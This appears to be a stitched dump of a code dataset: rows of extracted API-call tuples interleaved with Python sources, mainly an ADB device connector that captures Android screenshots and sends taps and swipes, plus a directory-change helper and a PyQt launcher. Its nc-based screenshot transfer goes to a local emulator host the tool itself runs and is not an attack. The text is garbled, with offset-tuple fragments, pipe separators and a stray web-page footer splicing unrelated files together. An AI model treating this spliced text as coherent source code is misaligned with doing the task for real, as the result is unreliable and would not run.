(['title'], {'fontsize': '(20)', 'y': '(0.9)'}), '(title, fontsize=20, y=0.9)\n', (1263, 1290), True, 'import matplotlib.pyplot as plt\n'), ((1297, 1332), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Accuracy"""'], {'fontsize': '(15)'}), "('Accuracy', fontsize=15)\n", (1307, 1332), True, 'import matplotlib.pyplot as plt\n'), ((1336, 1374), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Generations"""'], {'fontsize': '(15)'}), "('Generations', fontsize=15)\n", (1346, 1374), True, 'import matplotlib.pyplot as plt\n'), ((1378, 1392), 'matplotlib.pyplot.grid', 'plt.grid', (['(True)'], {}), '(True)\n', (1386, 1392), True, 'import matplotlib.pyplot as plt\n'), ((2393, 2403), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2401, 2403), True, 'import matplotlib.pyplot as plt\n'), ((438, 455), 'numpy.arange', 'np.arange', (['(0)', '(100)'], {}), '(0, 100)\n', (447, 455), True, 'import numpy as np\n'), ((477, 494), 'numpy.arange', 'np.arange', (['(0)', '(500)'], {}), '(0, 500)\n', (486, 494), True, 'import numpy as np\n'), ((598, 624), 'numpy.std', 'np.std', (['data_first'], {'axis': '(0)'}), '(data_first, axis=0)\n', (604, 624), True, 'import numpy as np\n'), ((649, 676), 'numpy.std', 'np.std', (['data_second'], {'axis': '(0)'}), '(data_second, axis=0)\n', (655, 676), True, 'import numpy as np\n'), ((1500, 1514), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1511, 1514), False, 'import pickle\n'), ((1770, 1780), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1778, 1780), True, 'import matplotlib.pyplot as plt\n'), ((1878, 1892), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1889, 1892), False, 'import pickle\n'), ((1437, 1481), 'os.path.join', 'os.path.join', (['"""./result/result_mnist.pickle"""'], {}), "('./result/result_mnist.pickle')\n", (1449, 1481), False, 'import os\n'), ((1810, 1859), 'os.path.join', 'os.path.join', (['"""./result/result_cifar_svhn.pickle"""'], {}), "('./result/result_cifar_svhn.pickle')\n", (1822, 1859), False, 'import os\n')] |
import os
import logging.config
from random import randint
import zlib
import struct
import socket
import time
from PIL import Image
import config
# from config import ADB_ROOT, ADB_HOST, SCREEN_SHOOT_SAVE_PATH, ShellColor, CONFIG_PATH,enable_adb_host_auto_detect, ADB_SERVER
from .ADBClientSession import ADBClientSession
from util.socketutil import recvall
from . import revconn
# from numpy import average, dot, linalg
logger = logging.getLogger(__name__)
def _screencap_to_image(cap):
w, h, pixels = cap
return Image.frombytes('RGBA', (w, h), pixels)
def _ensure_pil_image(imgorfile):
if isinstance(imgorfile, Image.Image):
return imgorfile
return Image.open(imgorfile)
def check_adb_alive():
try:
sess = ADBClientSession(config.ADB_SERVER)
version = int(sess.service('host:version').read_response().decode(), 16)
logger.debug('ADB server version %d', version)
return True
except ConnectionRefusedError:
return False
except RuntimeError:
return False
def ensure_adb_alive():
if check_adb_alive():
return
logger.info('尝试启动 adb server')
import subprocess
adbbin = config.get('device/adb_binary', None)
if adbbin is None:
adb_binaries = ['adb', os.path.join(config.ADB_ROOT, 'adb')]
else:
adb_binaries = [adbbin]
for adbbin in adb_binaries:
try:
logger.debug('trying %r', adbbin)
subprocess.run([adbbin, 'start-server'], check=True)
return True
except FileNotFoundError:
pass
except subprocess.CalledProcessError:
pass
raise OSError("can't start adb server")
class ADBConnector:
def __init__(self, adb_serial=None):
# os.chdir(ADB_ROOT)
self.ADB_ROOT = config.ADB_ROOT
self.adb_serial = adb_serial
self.host_session_factory = lambda: ADBClientSession(config.ADB_SERVER)
self.rch = None
if self.adb_serial is None:
self.adb_serial = self.__adb_device_name_detector()
self.device_session_factory = lambda: self.host_session_factory().device(self.adb_serial)
self.cache_screenshot = config.get('device/cache_screenshot', True)
self.last_screenshot_timestamp = 0
self.last_screenshot_duration = 0
self.last_screenshot = None
if config.get('device/try_emulator_enhanced_mode', True):
loopbacks = self._detect_loopbacks()
if len(loopbacks):
logger.debug('possible loopback addresses: %s', repr(loopbacks))
self.rch = revconn.ReverseConnectionHost()
self.rch.start()
if self._test_reverse_connection(loopbacks):
logger.info('正在使用模拟器优化模式')
self.screencap = self._reverse_connection_screencap
else:
self.rch.stop()
else:
self.loopback = None
def __del__(self):
if self.rch and self.rch.is_alive():
self.rch.stop()
def __adb_device_name_detector(self):
devices = [x for x in self.host_session_factory().devices() if x[1] != 'offline']
if len(devices) == 0:
auto_connect = config.get('device/adb_auto_connect', None)
if auto_connect is not None:
logger.info('没有已连接设备,尝试连接 %s', auto_connect)
try:
self.host_session_factory().disconnect(auto_connect)
except:
pass
self.host_session_factory().connect(auto_connect)
else:
raise RuntimeError('找不到可用设备')
devices = [x for x in self.host_session_factory().devices() if x[1] != 'offline']
always_use_device = config.get('device/adb_always_use_device', None)
if always_use_device is not None:
if always_use_device not in (x[0] for x in devices):
raise RuntimeError('设备 %s 未连接' % always_use_device)
return always_use_device
if len(devices) == 1:
device_name = devices[0][0]
elif len(devices) > 1:
logger.info("检测到多台设备")
num = 0
while True:
try:
num = int(input("请输入序号选择设备: "))
if not 0 <= num < len(devices):
raise ValueError()
break
except ValueError:
logger.error("输入不合法,请重新输入")
device_name = devices[num][0]
else:
raise RuntimeError('找不到可用设备')
logger.info("确认设备名称:" + device_name)
return device_name
def run_device_cmd(self, cmd, DEBUG_LEVEL=2):
output = self.device_session_factory().exec(cmd)
logger.debug("command: %s", cmd)
logger.debug("output: %s", repr(output))
return output
def get_sub_screen(self, image, screen_range):
return image.crop(
(
screen_range[0][0],
screen_range[0][1],
screen_range[0][0] + screen_range[1][0],
screen_range[0][1] + screen_range[1][1]
)
)
def _detect_loopbacks(self):
board = self.device_session_factory().exec('getprop ro.product.board')
if b'goldfish' in board:
return ['10.0.2.2']
modules = self.device_session_factory().exec('grep -o vboxguest /proc/modules')
if b'vboxguest' in modules:
arp = self.device_session_factory().exec('cat /proc/net/arp')
return [x[:x.find(b' ')].decode() for x in arp.splitlines()[1:]]
return []
def _test_reverse_connection(self, loopbacks):
for addr in loopbacks:
logger.debug('testing loopback address %s', addr)
future = self.rch.register_cookie()
with future:
cmd = 'echo -n %sOKAY | nc -w 1 %s %d' % (future.cookie.decode(), addr, self.rch.port)
logger.debug(cmd)
control_sock = self.device_session_factory().exec_stream(cmd)
with control_sock:
conn = future.get(2)
if conn is not None:
data = recvall(conn)
conn.close()
if data == b'OKAY':
self.loopback = addr
logger.debug('found loopback address %s', addr)
return True
return False
def screencap_png(self):
"""returns PNG bytes"""
s = self.device_session_factory().exec_stream('screencap -p')
data = recvall(s, 4194304)
return data
def screencap(self):
"""returns (width, height, pixels)
pixels in RGBA/RGBX format"""
s = self.device_session_factory().exec_stream('screencap|gzip -1')
data = recvall(s, 4194304)
s.close()
data = zlib.decompress(data, zlib.MAX_WBITS | 16, 8388608)
w, h, f = struct.unpack_from('III', data, 0)
assert (f == 1)
return (w, h, data[12:])
def _reverse_connection_screencap(self):
"""returns (width, height, pixels)
pixels in RGBA/RGBX format"""
future = self.rch.register_cookie()
with future:
control_sock = self.device_session_factory().exec_stream('(echo -n %s; screencap) | nc %s %d' % (future.cookie.decode(), self.loopback, self.rch.port))
with control_sock:
with future.get() as conn:
data = recvall(conn, 8388608, True)
w, h, f = struct.unpack_from('III', data, 0)
assert (f == 1)
return (w, h, data[12:].tobytes())
def screenshot(self, cached=True):
t0 = time.monotonic()
if cached and self.cache_screenshot:
if self.last_screenshot is not None and t0 - self.last_screenshot_timestamp < self.last_screenshot_duration:
return self.last_screenshot
rawcap = self.screencap()
img = _screencap_to_image(rawcap)
t1 = time.monotonic()
self.last_screenshot_timestamp = t1
self.last_screenshot_duration = t1 - t0
self.last_screenshot = img
return img
def touch_swipe2(self, origin, movement, duration=None):
# sleep(1)
x1, y1, x2, y2 = origin[0], origin[1], origin[0] + movement[0], origin[1] + movement[1]
logger.debug("滑动初始坐标:({},{}); 移动距离dX:{}, dy:{}".format(*origin, *movement))
command = "input swipe {} {} {} {} ".format(x1, y1, x2, y2)
if duration is not None:
command += str(int(duration))
self.run_device_cmd(command)
def touch_tap(self, XY=None, offsets=None):
# sleep(10)
# sleep(0.5)
if offsets is not None:
final_X = XY[0] + randint(-offsets[0], offsets[0])
final_Y = XY[1] + randint(-offsets[1], offsets[1])
else:
final_X = XY[0] + randint(-1, 1)
final_Y = XY[1] + randint(-1, 1)
# 如果你遇到了问题,可以把这百年输出并把日志分享到群里。
logger.debug("点击坐标:({},{})".format(final_X, final_Y))
command = "input tap {} {}".format(final_X,
final_Y)
self.run_device_cmd(command)
| [
"PIL.Image.open",
"config.get",
"time.monotonic",
"subprocess.run",
"os.path.join",
"util.socketutil.recvall",
"PIL.Image.frombytes",
"random.randint",
"zlib.decompress",
"struct.unpack_from"
] | [((529, 568), 'PIL.Image.frombytes', 'Image.frombytes', (['"""RGBA"""', '(w, h)', 'pixels'], {}), "('RGBA', (w, h), pixels)\n", (544, 568), False, 'from PIL import Image\n'), ((684, 705), 'PIL.Image.open', 'Image.open', (['imgorfile'], {}), '(imgorfile)\n', (694, 705), False, 'from PIL import Image\n'), ((1186, 1223), 'config.get', 'config.get', (['"""device/adb_binary"""', 'None'], {}), "('device/adb_binary', None)\n", (1196, 1223), False, 'import config\n'), ((2199, 2242), 'config.get', 'config.get', (['"""device/cache_screenshot"""', '(True)'], {}), "('device/cache_screenshot', True)\n", (2209, 2242), False, 'import config\n'), ((2376, 2429), 'config.get', 'config.get', (['"""device/try_emulator_enhanced_mode"""', '(True)'], {}), "('device/try_emulator_enhanced_mode', True)\n", (2386, 2429), False, 'import config\n'), ((3796, 3844), 'config.get', 'config.get', (['"""device/adb_always_use_device"""', 'None'], {}), "('device/adb_always_use_device', None)\n", (3806, 3844), False, 'import config\n'), ((6688, 6707), 'util.socketutil.recvall', 'recvall', (['s', '(4194304)'], {}), '(s, 4194304)\n', (6695, 6707), False, 'from util.socketutil import recvall\n'), ((6925, 6944), 'util.socketutil.recvall', 'recvall', (['s', '(4194304)'], {}), '(s, 4194304)\n', (6932, 6944), False, 'from util.socketutil import recvall\n'), ((6978, 7029), 'zlib.decompress', 'zlib.decompress', (['data', '(zlib.MAX_WBITS | 16)', '(8388608)'], {}), '(data, zlib.MAX_WBITS | 16, 8388608)\n', (6993, 7029), False, 'import zlib\n'), ((7048, 7082), 'struct.unpack_from', 'struct.unpack_from', (['"""III"""', 'data', '(0)'], {}), "('III', data, 0)\n", (7066, 7082), False, 'import struct\n'), ((7644, 7678), 'struct.unpack_from', 'struct.unpack_from', (['"""III"""', 'data', '(0)'], {}), "('III', data, 0)\n", (7662, 7678), False, 'import struct\n'), ((7799, 7815), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (7813, 7815), False, 'import time\n'), ((8115, 8131), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (8129, 8131), False, 'import time\n'), ((1278, 1314), 'os.path.join', 'os.path.join', (['config.ADB_ROOT', '"""adb"""'], {}), "(config.ADB_ROOT, 'adb')\n", (1290, 1314), False, 'import os\n'), ((1461, 1513), 'subprocess.run', 'subprocess.run', (["[adbbin, 'start-server']"], {'check': '(True)'}), "([adbbin, 'start-server'], check=True)\n", (1475, 1513), False, 'import subprocess\n'), ((3257, 3300), 'config.get', 'config.get', (['"""device/adb_auto_connect"""', 'None'], {}), "('device/adb_auto_connect', None)\n", (3267, 3300), False, 'import config\n'), ((8872, 8904), 'random.randint', 'randint', (['(-offsets[0])', 'offsets[0]'], {}), '(-offsets[0], offsets[0])\n', (8879, 8904), False, 'from random import randint\n'), ((8935, 8967), 'random.randint', 'randint', (['(-offsets[1])', 'offsets[1]'], {}), '(-offsets[1], offsets[1])\n', (8942, 8967), False, 'from random import randint\n'), ((9012, 9026), 'random.randint', 'randint', (['(-1)', '(1)'], {}), '(-1, 1)\n', (9019, 9026), False, 'from random import randint\n'), ((9057, 9071), 'random.randint', 'randint', (['(-1)', '(1)'], {}), '(-1, 1)\n', (9064, 9071), False, 'from random import randint\n'), ((7597, 7625), 'util.socketutil.recvall', 'recvall', (['conn', '(8388608)', '(True)'], {}), '(conn, 8388608, True)\n', (7604, 7625), False, 'from util.socketutil import recvall\n'), ((6260, 6273), 'util.socketutil.recvall', 'recvall', (['conn'], {}), '(conn)\n', (6267, 6273), False, 'from util.socketutil import recvall\n')] |
import inspect
import os
from pathlib import Path
class change_directory:
"""
A class for changing the working directory using a "with" statement.
It takes the directory to change to as an argument. If no directory is given,
it takes the directory of the file from which this function was called.
"""
def __init__(self, directory: str = None) -> None:
self.old_dir = os.getcwd()
if directory is None:
self.new_dir = Path(inspect.getabsfile(inspect.stack()[1][0])).parent # type: ignore
else:
self.new_dir = directory
def __enter__(self, *_) -> None:
os.chdir(self.new_dir)
def __exit__(self, *_) -> None:
os.chdir(self.old_dir)
| [
"os.chdir",
"inspect.stack",
"os.getcwd"
] | [((415, 426), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (424, 426), False, 'import os\n'), ((659, 681), 'os.chdir', 'os.chdir', (['self.new_dir'], {}), '(self.new_dir)\n', (667, 681), False, 'import os\n'), ((730, 752), 'os.chdir', 'os.chdir', (['self.old_dir'], {}), '(self.old_dir)\n', (738, 752), False, 'import os\n'), ((510, 525), 'inspect.stack', 'inspect.stack', ([], {}), '()\n', (523, 525), False, 'import inspect\n')] |
import sys
from PyQt5.QtWidgets import QApplication
from gui import MgallManager
def main():
app = QApplication(sys.argv)
ex = MgallManager()
app.aboutToQuit.connect(ex.ExitHandler)
sys.exit(app.exec_())
if __name__ == "__main__":
main()
| [
"gui.MgallManager",
"PyQt5.QtWidgets.QApplication"
] | [((106, 128), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (118, 128), False, 'from PyQt5.QtWidgets import QApplication\n'), ((138, 152), 'gui.MgallManager', 'MgallManager', ([], {}), '()\n', (150, 152), False, 'from gui import MgallManager\n')] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.